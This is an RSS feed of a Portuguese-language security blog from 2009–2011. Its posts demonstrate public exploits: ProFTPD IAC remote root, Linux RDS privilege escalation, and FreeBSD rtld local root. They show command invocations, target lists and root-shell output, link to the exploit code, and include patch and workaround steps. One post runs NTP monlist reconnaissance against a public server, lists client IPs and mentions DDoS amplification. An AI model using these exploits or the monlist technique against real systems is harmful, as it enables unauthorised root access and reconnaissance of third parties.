<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>b0telh0...</title>
	<atom:link href="http://www.leonardobotelho.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.leonardobotelho.com/blog</link>
	<description>print &#039;\x62\x30\x74\x65\x6c\x68\x30\x2e\x2e\x2e&#039;</description>
	<lastBuildDate>Thu, 17 Feb 2011 20:01:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>proftpd IAC remote root exploit</title>
		<link>http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/#comments</comments>
		<pubDate>Mon, 08 Nov 2010 04:16:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[proftpd]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[root]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=265</guid>
		<description><![CDATA[By: Kingcope http://www.exploit-db.com/exploits/15449/ Fiz um teste no: FreeBSD 8.1 i386, ProFTPD 1.3.3a FreeBSD 8.0 i386, ProFTPD 1.3.2a root@bt:/tmp# perl 15449.pl written by kingcope usage: proremote.pl [0] FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary) [1] FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary) [2] Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary) [3] Debian GNU/Linux 5.0, ProFTPD [...]]]></description>
			<content:encoded><![CDATA[<p>By: Kingcope<br />
<a href="http://www.exploit-db.com/exploits/15449/" target="_blank">http://www.exploit-db.com/exploits/15449/</a></p>
<p>Fiz um teste no:<br />
FreeBSD 8.1 i386, ProFTPD 1.3.3a<br />
FreeBSD 8.0 i386, ProFTPD 1.3.2a</p>
<blockquote><p>
root@bt:/tmp# perl 15449.pl<br />
written by kingcope<br />
usage:<br />
proremote.pl <target ip/host> <your ip> <target type></p>
<p>        [0]     FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)<br />
        [1]     FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)<br />
        [2]     Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [3]     Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)<br />
        [4]     Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [5]     Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)<br />
        [6]     SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [7]     SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [8]     SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [9]     SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [10]    SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [11]    SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)<br />
        [12]    CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)
</p></blockquote>
<p style="clear:both;padding-top:30px;"><strong>fbsd 8.0:</strong></p>
<p><a href="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/11/pro01.png" target="_blank"><img src="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/11/pro01.png" alt="" title="fbsd_80" width="600" height="330" class="alignnone size-full wp-image-268" /></a></p>
<p style="clear:both;padding-top:30px;"><strong>fbsd 8.1:</strong></p>
<p><a href="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/11/pro02.png" target="_blank"><img src="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/11/pro02.png" alt="" title="fbsd_81" width="600" height="330" class="alignnone size-full wp-image-269" /></a></p>
<p style="clear:both;padding-top:30px;">Abs!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>linux RDS protocol local privilege escalation</title>
		<link>http://www.leonardobotelho.com/blog/2010/10/linux-rds-protocol-local-privilege-escalation/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/10/linux-rds-protocol-local-privilege-escalation/#comments</comments>
		<pubDate>Thu, 21 Oct 2010 04:37:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[local]]></category>
		<category><![CDATA[privilege escalation]]></category>
		<category><![CDATA[root]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=252</guid>
		<description><![CDATA[&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Advisory Name: Linux RDS Protocol Local Privilege Escalation Release Date: 2010-10-19 Application: Linux Kernel Versions: 2.6.30 &#8211; 2.6.36-rc8 Severity: High Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com > Vendor Status: Patch Released CVE Candidate: CVE-2010-3904 &#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Recommendation: Users should install updates provided by downstream distributions or apply the committed patch and recompile [...]]]></description>
			<content:encoded><![CDATA[<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Advisory Name: Linux RDS Protocol Local Privilege Escalation<br />
Release Date: 2010-10-19<br />
Application: Linux Kernel<br />
Versions: 2.6.30 &#8211; 2.6.36-rc8<br />
Severity: High<br />
Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com ><br />
Vendor Status: Patch Released<br />
CVE Candidate: CVE-2010-3904<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="clear:both;padding-top:30px;"><strong>Recommendation:</strong></p>
<p>Users should install updates provided by downstream distributions or apply the committed patch and recompile their kernel.<br />
Preventing the RDS kernel module from loading is an effective workaround. This can be accomplished by executing the following command as root:</p>
<p><em>echo &#8220;alias net-pf-21 off&#8221; > /etc/modprobe.d/disable-rds</em></p>
<p style="clear:both;padding-top:30px;"><strong>Proof-of-Concept Exploit:</strong></p>
<p><a href="http://www.vsecurity.com/download/tools/linux-rds-exploit.c" target="_blank">http://www.vsecurity.com/download/tools/linux-rds-exploit.c</a></p>
<p style="clear:both;padding-top:30px;"><strong>Testing:</strong></p>
<blockquote><p>
b0t@snow:/tmp$ gcc -o rds linux-rds-exploit.c<br />
b0t@snow:/tmp$ ./rds<br />
[*] Linux kernel >= 2.6.30 RDS socket exploit<br />
[*] by Dan Rosenberg<br />
[*] Resolving kernel addresses&#8230;<br />
 [+] Resolved rds_proto_ops to 0xffffffffa0aab8c0<br />
 [+] Resolved rds_ioctl to 0xffffffffa0aa4000<br />
 [+] Resolved commit_creds to 0xffffffff810863b0<br />
 [+] Resolved prepare_kernel_cred to 0xffffffff81086880<br />
[*] Overwriting function pointer&#8230;<br />
[*] Triggering payload&#8230;<br />
[*] Restoring function pointer&#8230;<br />
[*] Got root!<br />
# uname -a<br />
Linux snow 2.6.35-22-generic #34-Ubuntu SMP Sun Oct 10 09:26:05 UTC 2010 x86_64 GNU/Linux<br />
# id<br />
uid=0(root) gid=0(root) groups=0(root)<br />
#
</p></blockquote>
<p style="clear:both;padding-top:30px;"><strong>Reference:</strong></p>
<p><a href="http://www.vsecurity.com/resources/advisory/20101019-1/" target="_blank">http://www.vsecurity.com/resources/advisory/20101019-1/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/10/linux-rds-protocol-local-privilege-escalation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>dllhijackauditkit</title>
		<link>http://www.leonardobotelho.com/blog/2010/08/dllhijackauditkit/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/08/dllhijackauditkit/#comments</comments>
		<pubDate>Thu, 26 Aug 2010 11:57:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[dllhijackauditkit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=223</guid>
		<description><![CDATA[Depois que o HD Moore liberou essa ferramenta no final de semana, a festa durante os dias seguintes tem sido grande&#8230; A cada F5 que se dá no http://www.exploit-db.com/ é um software novo que aparece heeheh :) Resolvi fazer um vídeo mostrando o uso da ferramenta&#8230; Mais informações podem ser verificadas aqui: http://blog.metasploit.com/2010/08/better-faster-stronger.html e aqui [...]]]></description>
			<content:encoded><![CDATA[<p>Depois que o HD Moore liberou essa ferramenta no final de semana, a festa durante os dias seguintes tem sido grande&#8230;<br />
A cada F5 que se dá no <a href="http://www.exploit-db.com/" target="_blank">http://www.exploit-db.com/</a> é um software novo que aparece heeheh :)</p>
<p>Resolvi fazer um vídeo mostrando o uso da ferramenta&#8230;</p>
<p><iframe src="http://player.vimeo.com/video/14442659?color=ff9933" width="601" height="451" frameborder="0"></iframe></p>
<p>Mais informações podem ser verificadas aqui:<br />
<a href="http://blog.metasploit.com/2010/08/better-faster-stronger.html" target="_blank">http://blog.metasploit.com/2010/08/better-faster-stronger.html</a> e aqui <a href="http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html" target="_blank">http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html</a></p>
<p>Até mais!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/08/dllhijackauditkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>securitybsd</title>
		<link>http://www.leonardobotelho.com/blog/2010/05/securitybsd/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/05/securitybsd/#comments</comments>
		<pubDate>Mon, 24 May 2010 22:44:28 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[securitybsd]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=204</guid>
		<description><![CDATA[Esse post é um ctrl+c, ctrl+v de um post introdutório sobre o SecurityBSD feito pelo Matthew Hughes. Quando eu vi o anuncio do projeto, achei interessante, entrei em contato com ele e resolvi fazer parte do mesmo. Espero que o projeto vá pra frente e que a comunidade contribua bastante também. Criei uma área só [...]]]></description>
			<content:encoded><![CDATA[<p>Esse post é um ctrl+c, ctrl+v de um post introdutório sobre o SecurityBSD feito pelo Matthew Hughes.<br />
Quando eu vi o anuncio do projeto, achei interessante, entrei em contato com ele e resolvi fazer parte do mesmo. Espero que o projeto vá pra frente e que a comunidade contribua bastante também.<br />
Criei uma área só sobre o SecurityBSD, que pode ser acessada  em <a href="http://www.leonardobotelho.com/blog/securitybsd/" target="_blank">http://www.leonardobotelho.com/blog/securitybsd/</a>. Lá estarei postando atualizações do projeto conforme elas forem aparecendo.</p>
<p><img src="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/05/sec_boot-e1274740337756.png" alt="securitybsd_boot" title="sec_boot" width="600" height="329" class="alignnone size-full wp-image-209" /></p>
<blockquote><p><strong><em>Introducing SecurityBSD</em></strong></p>
<p>We’re all familiar with the FreeBSD operating system. It’s a powerful, UNIX based operating system that is secure, stable with a low memory footprint. Introducing SecurityBSD. SecurityBSD is a bundling of the FreeBSD operating system with open source security tools aimed at computer security profesionals and enthusiasts, and intends to be a serious contender to the more popular security Linux distributions such as Backtrack Linux, Weaknet Linux and SamuraiWTF.</p>
<p>SecurityBSD can be used on your old beige-box or on the latest computer hardware, it really doesn’t matter. One of the advantages of SecurityBSD is that it is lightweight, and can be used on legacy machines, which will be ideal for enterprises with a small IT security budget, especially in the developing world.</p>
<p>In its current incarnation, there is little to no customization to reflect that it is, in fact, a distribution independent of FreeBSD. It retains FreeBSD branding and the modifications are limited to installations of NMAP and Metasploit. This is an extremely early showcase of what I’m yearning towards with regards to the development of this BSD distribution. Future editions will contain the SecurityBSD project branding and will contain a wide range of security tools.</p>
<p>I’m pretty excited about the development of SecurityBSD, as it offers me an opportunity to learn more about the security tools which my career will be based upon and UNIX, and I’ve got high hopes for it.</p>
<p>A virtualbox appliance will be posted online in a few days, and I hope that you, the computer security and FreeBSD community approach this project with the same level of enthusiasm that I have for this project, and turn it in to a viable security auditing tool.</p>
<p>Finally, I’d like to express my deepest gratitude to the hundreds who have contributed code to the FreeBSD project and made it possible for me to make SecurityBSD.</p>
<p><em>Matthew Hughes</em>
</p></blockquote>
<p>Abs!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/05/securitybsd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>diversão com NTP servers</title>
		<link>http://www.leonardobotelho.com/blog/2010/04/diversao-com-ntp-servers/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/04/diversao-com-ntp-servers/#comments</comments>
		<pubDate>Sat, 10 Apr 2010 15:45:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[footprinting]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[ntp]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=172</guid>
		<description><![CDATA[Estava dando uma olhada no blog do carnal0wnage essa semana, e li sobre um novo auxiliary module que o HD Moore tinha liberado&#8230; ntp_monlist é legal, porque ele faz uma consulta para servidores NTP e lista os últimos IPs dos clientes. O blog também faz um referencia a um post no blog da SensePost&#8230; Eles [...]]]></description>
			<content:encoded><![CDATA[<p>Estava dando uma olhada no blog do carnal0wnage essa semana, e li sobre um novo auxiliary module que o HD Moore tinha liberado&#8230; <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/ntp/ntp_monlist.rb" target="_blank">ntp_monlist</a></p>
<p>é legal, porque ele faz uma consulta para servidores NTP e lista os últimos IPs dos clientes. O blog também faz um referencia a um post no blog da SensePost&#8230; Eles fizeram outros testes utilizando a ferramenta maltego por exemplo e alguns comentários interessantes:</p>
<blockquote><p>
<strong>Have data, what now?</strong><br />
The most immediate application of this method will probably be more revealing footprinting exercises. For example:</p>
<li>Certain devices are pre-configured to use a certain ntp server, which one can query to find all those devices</li>
<li>Certain products are pre-configured in a similar fashion, eg. Ubuntu</li>
<li>NTP servers could leak internal network details and possible one of their other addresses(IPV6 or another network if multihomed)</li>
<li>IPs that will never show up in customary rDNS and fDNS queries may now suddenly pop up</li>
</blockquote>
<blockquote><p>
<strong>Bandwidth implications:</strong> So we know that a busy server&#8217;s ‘client cache&#8217; will have 600 entries and wireshark tells us that each result packet is 468 bytes (IP+UDP+NTP). Each result packet only contains 6 results so one is looking at +- 45kbytes of data for each request packet of 220 bytes (IP+UDP+NTP). The NTP server will just dump the data so you will need a sizeable down-link to catch all 100 UDP packets. Moore mentioned that he has developed a technique to create a 30 gigabit/sec DDOS which is not easy to defend against. Our bet is that spoofing the source address of the monlist request may be a way for creating a DDOS attack.
</p></blockquote>
<p>Testando o módulo e manualmente..</p>
<p><strong>Metasploit:</strong></p>
<p>msf > use auxiliary/scanner/ntp/ntp_monlist<br />
msf auxiliary(1mntp_monlist) > set RHOSTS a.ntp.br<br />
RHOSTS => a.ntp.br<br />
msf auxiliary(1mntp_monlist) > run</p>
<p>[*] Sending probes to 200.160.0.8->200.160.0.8 (1 hosts)<br />
[*] 200.160.0.8:123 201.48.104.130:12559 (200.160.0.8)<br />
[*] 200.160.0.8:123 201.28.104.202:247 (200.160.0.8)<br />
[*] 200.160.0.8:123 201.72.252.178:40 (200.160.0.8)<br />
[*] 200.160.0.8:123 201.16.68.16:1025 (200.160.0.8)<br />
[*] 200.160.0.8:123 189.86.112.61:123 (200.160.0.8)<br />
&#8230;<br />
[*] 200.160.0.8:123 187.12.217.250:57265 (200.160.0.8)<br />
[*] 200.160.0.8:123 187.16.138.10:123 (200.160.0.8)<br />
[*] 200.160.0.8:123 187.16.241.3:55101 (200.160.0.8)<br />
[*] 200.160.0.8:123 189.115.138.116:1626 (200.160.0.8)<br />
[*] 200.160.0.8:123 201.70.200.170:123 (200.160.0.8)<br />
[*] Scanned 1 of 1 hosts (100% complete)<br />
[*] Auxiliary module execution completed</p>
<p style="clear:both;padding-top:30px;"><strong>ntpdc:</strong></p>
<p>root@bt:~# ntpdc -c monlist a.ntp.br<br />
remote address          port local address      count m ver code avgint  lstint<br />
===============================================================================<br />
187.59.59.152.static.h 59959 200.160.0.8           12 7 2    1b0      0       0                                      <em>(oh eu aqui rsrsr)</em><br />
200.99.150.227           100 200.160.0.8     11267899 1 3    1b0      0       0<br />
201-28-104-202.custome   337 200.160.0.8        31789 1 3    1b0      0       0<br />
200-140-168-34.pvoce20 62834 200.160.0.8      2688898 3 3    1b0      0       0<br />
189-108-236-228.custom  1100 200.160.0.8         1199 3 4    190     31       0<br />
router.compel.topnet.c  2049 200.160.0.8         1209 3 3    190     10       0<br />
c9526933.virtua.com.br 35899 200.160.0.8      1605526 1 3    1b0      0       0<br />
nataddr.pbh.gov.br     40401 200.160.0.8        21902 3 1    1b0      0       0<br />
189-47-237-9.dsl.teles   123 200.160.0.8         1250 1 3    190     16       0<br />
201.72.252.178           494 200.160.0.8     16435604 1 3    1b0      0       0<br />
201-0-210-224.dial-up.  1323 200.160.0.8        14062 3 3    190      4       0<br />
189.2.161.130           2487 200.160.0.8        13125 6 2    1b0      0       0<br />
firewall.magal.ind.br  25667 200.160.0.8      5866570 1 3    1b0      0       0<br />
autopistalitoralsul36.   354 200.160.0.8        11774 1 3    1b0      0       0<br />
189.38.69.70           30710 200.160.0.8            2 3 3    190     27       0<br />
&#8230;.</p>
<p style="clear:both;padding-top:30px;"><strong>Maltego:</strong></p>
<p><a href="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/04/maltego_ntp.png" target="_blank"><img src="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/04/maltego_ntp-300x140.png" alt="" title="maltego_ntp" width="300" height="140" class="alignnone size-medium wp-image-191" /></a></p>
<p style="clear:both;padding-top:50px;">Abs!</p>
<p>Refs:<br />
<a href="http://carnal0wnage.attackresearch.com/node/410" target="_blank">http://carnal0wnage.attackresearch.com/node/410</a><br />
<a href="http://www.sensepost.com/blog/4552.html" target="_blank">http://www.sensepost.com/blog/4552.html</a><br />
<a href="http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html" target="_blank">http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html</a><br />
<a href="http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html" target="_blank">http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/04/diversao-com-ntp-servers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>pen testing the web with firefox</title>
		<link>http://www.leonardobotelho.com/blog/2010/03/pen-testing-the-web-with-firefox/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/03/pen-testing-the-web-with-firefox/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 23:21:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[add-ons]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=153</guid>
		<description><![CDATA[E ai.. Essa semana eu assisti um webcast bem interessante que falava sobre pentest com o firefox. Falou sobre diversos add-ons que você poderia estar utilizando para auxiliar na realização de um pentest. Alguns são bem conhecidos e outros, pelo menos eu, não conhecia. Vale a pena dar uma conferida&#8230; Black Hat Webcast: Pen Testing [...]]]></description>
			<content:encoded><![CDATA[<p>E ai..</p>
<p>Essa semana eu assisti um webcast bem interessante que falava sobre pentest com o firefox. Falou sobre diversos add-ons que você poderia estar utilizando para auxiliar na realização de um pentest. Alguns são bem conhecidos e outros, pelo menos eu, não conhecia. Vale a pena dar uma conferida&#8230;</p>
<p>Black Hat Webcast: Pen Testing the Web with Firefox (theprez98)<br />
Slides: <a href="http://www.scribd.com/doc/28590479/Black-Hat-Webcast-Pen-Testing-the-Web-with-Firefox" target="_blank">http://www.scribd.com/doc/28590479/Black-Hat-Webcast-Pen-Testing-the-Web-with-Firefox</a></p>
<p>Você pode dar uma olhada também no FIRECAT (Firefox Catalog of Auditing Toolbox). É um catalogo com uma lista gigante de add-ons que podem ser instalados no firefox para dar uma turbinada no bichinho. <a href="http://www.security-database.com/toolswatch/FireCAT-v1-6-2-updated-with,1092.html" target="_blank">FireCAT v1.6.2 updated&#8230;</a></p>
<p>Grande abraço!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/03/pen-testing-the-web-with-firefox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>backtrack 4 final</title>
		<link>http://www.leonardobotelho.com/blog/2010/01/backtrack-4-final/</link>
		<comments>http://www.leonardobotelho.com/blog/2010/01/backtrack-4-final/#comments</comments>
		<pubDate>Wed, 13 Jan 2010 16:46:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[offsec]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=104</guid>
		<description><![CDATA[Olá, Depois de um certo tempo de espera, foi lançada a versão final do backtrack 4&#8230; *http://www.offensive-security.com/blog/ BackTrack 4 Final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold [...]]]></description>
			<content:encoded><![CDATA[<p>Olá,</p>
<p>Depois de um certo tempo de espera, foi lançada a versão final do backtrack 4&#8230;</p>
<p><img src="http://www.leonardobotelho.com/blog/wp-content/uploads/2010/01/bt4-fireworks-1.png" alt="bt4" title="bt4" width="482" height="337" class="alignnone size-full wp-image-107" /><br />
<del datetime="2010-01-13T16:11:05+00:00">*http://www.offensive-security.com/blog/</del></p>
<blockquote><p>
<em>BackTrack 4 Final is out and along with this release come some exciting news, updates, and developments. BackTrack 4 has been a long and steady road, with the release of a beta last year, we decided to hold off on releasing BackTrack 4 Final until it was perfected in every way shape and form.</em>
</p></blockquote>
<p>Além das diversas atualizações que foram realizadas no sistema em si, o projeto está com uma &#8220;<a href="http://www.backtrack-linux.org/" target="_blank">casa</a>&#8221; nova, terá um novo fórum, além de outras mudanças.<br />
Confira a nova versão <a href="http://www.backtrack-linux.org/downloads/" target="_blank">aqui</a>.</p>
<p>Abs!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2010/01/backtrack-4-final/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>freebsd run-time link-editor local</title>
		<link>http://www.leonardobotelho.com/blog/2009/12/freebsd-run-time-link-editor-local/</link>
		<comments>http://www.leonardobotelho.com/blog/2009/12/freebsd-run-time-link-editor-local/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 20:34:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[privilege escalation]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=93</guid>
		<description><![CDATA[O exploit foi publicado no exploit-db.com dia 30/11/2009 e o Security Advisory saiu dia 03/12/2009, mas não custa nada relembrar isso. :) *Falha: Elevação de privilégios no rtld com envenenamento de ambiente. (FreeBSD Brasil) *Sistema: FreeBSD 7.1, 7.2, 8.0 *Security Advisory: FreeBSD-SA-09:16.rtld *Exploit: FreeBSD Run-Time Link-Editor Local Testar o exploit é extremamente simples. Logado com [...]]]></description>
			<content:encoded><![CDATA[<p>O exploit foi publicado no exploit-db.com dia 30/11/2009 e o Security Advisory saiu dia 03/12/2009, mas não custa nada relembrar isso. :)</p>
<p>*Falha: Elevação de privilégios no rtld com envenenamento de ambiente. (<a href="http://www.freebsdbrasil.com.br/home.php?area=10&#038;ida=678" target="_blank">FreeBSD Brasil</a>)<br />
*Sistema: FreeBSD 7.1, 7.2, 8.0<br />
*Security Advisory: <a href="http://security.freebsd.org/advisories/FreeBSD-SA-09:16.rtld.asc" target="_blank">FreeBSD-SA-09:16.rtld</a><br />
*Exploit: <a href="http://www.exploit-db.com/exploits/10255" target="_blank">FreeBSD Run-Time Link-Editor Local</a></p>
<p>Testar o exploit é extremamente simples.<br />
Logado com um usuário não privilegiado, baixe e execute o exploit&#8230;</p>
<blockquote><p>
$ uname -a<br />
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009     root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386<br />
$ id<br />
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)<br />
$ ./bsd.sh<br />
bsd.sh FreeBSD local r00t zeroday<br />
by Kingcope<br />
November 2009<br />
env.c: In function &#8216;main&#8217;:<br />
env.c:5: warning: incompatible implicit declaration of built-in function &#8216;malloc&#8217;<br />
env.c:9: warning: incompatible implicit declaration of built-in function &#8216;strcpy&#8217;<br />
env.c:11: warning: incompatible implicit declaration of built-in function &#8216;execl&#8217;<br />
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
ALEX-ALEX<br />
#<br />
# id<br />
uid=1001(b0t) gid=1001(b0t) euid=0(root) groups=1001(b0t)
</p></blockquote>
<p>Caso ainda não tenha atualizado o seu Sistema, é só realizar o procedimento do Security Advisory ou usar o freebsd-update.</p>
<blockquote><p>
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch<br />
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc<br />
(root@fbsd8) /tmp# cd /usr/src/<br />
(root@fbsd8) /usr/src# patch < /tmp/rtld.patch<br />
(root@fbsd8) /usr/src# cd /usr/src/libexec/rtld-elf/<br />
(root@fbsd8) /usr/src/libexec/rtld-elf# make obj &#038;&#038; make depend &#038;&#038; make &#038;&#038; make install</p>
<p>ou</p>
<p>(root@fbsd8) ~# freebsd-update fetch install
</p></blockquote>
<p>Depois é só testar o exploit novamente&#8230;</p>
<blockquote><p>
$ uname -a<br />
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009     root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386<br />
$ id<br />
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)<br />
$<br />
$ ./bsd.sh<br />
bsd.sh env env.c program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday<br />
by Kingcope<br />
November 2009<br />
env.c: In function &#8216;main&#8217;:<br />
env.c:5: warning: incompatible implicit declaration of built-in function &#8216;malloc&#8217;<br />
env.c:9: warning: incompatible implicit declaration of built-in function &#8216;strcpy&#8217;<br />
env.c:11: warning: incompatible implicit declaration of built-in function &#8216;execl&#8217;<br />
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).<br />
/libexec/ld-elf.so.1: environment corrupt; missing value for<br />
/libexec/ld-elf.so.1: environment corrupt; aborting<br />
$<br />
$ id<br />
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
</p></blockquote>
<p>Abs!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.leonardobotelho.com/blog/2009/12/freebsd-run-time-link-editor-local/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>google chrome os</title>
		<link>http://www.leonardobotelho.com/blog/2009/11/google-chrome-os/</link>
		<comments>http://www.leonardobotelho.com/blog/2009/11/google-chrome-os/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 04:51:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[chrome os]]></category>
		<category><![CDATA[chrome os ssh]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://www.leonardobotelho.com/blog/?p=54</guid>
